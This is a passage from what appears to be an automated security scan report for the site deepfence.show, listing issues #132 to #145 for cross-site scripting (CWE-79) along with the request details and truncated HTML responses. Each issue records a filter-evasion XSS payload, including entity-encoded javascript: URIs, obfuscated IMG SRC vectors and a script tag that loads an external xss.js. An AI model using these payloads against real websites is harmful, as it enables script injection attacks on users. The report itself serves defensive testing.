End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #132\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '';!--\"<XSS>=&{()}\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #133\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT SRC=http://soapui.org/xss.js></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #134\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #135\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=javascript:alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #136\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=JaVaScRiPt:alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #137\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=javascript:alert(&quot;XSS&quot;)>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #138\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #139\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #140\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=javascript:alert(String.fromCharCode(\n88,83,83))>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #141\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&\n#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&\n#40;&#39;&#88;&#83;&#83;&#39;&#41;>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #142\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<IMG SRC=&#0000106&#0000097&#0000118&#0000097&\n#0000115&#0000099&#0000114&#0000105&#0000112&\n#0000116&#0000058&#0000097&#0000108&#0000101&\n#0000114&#0000116&#0000040&#0000039&#0000088&\n#0000083&#0000083&#0000039&#0000041>ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #143\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#\nx69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&\n#x27&#x58&#x53&#x53&#x27&#x29>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io not be echoed back in the response\nCWE-ID CWE-79\nIssue Number #144\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"jav ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #145\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> 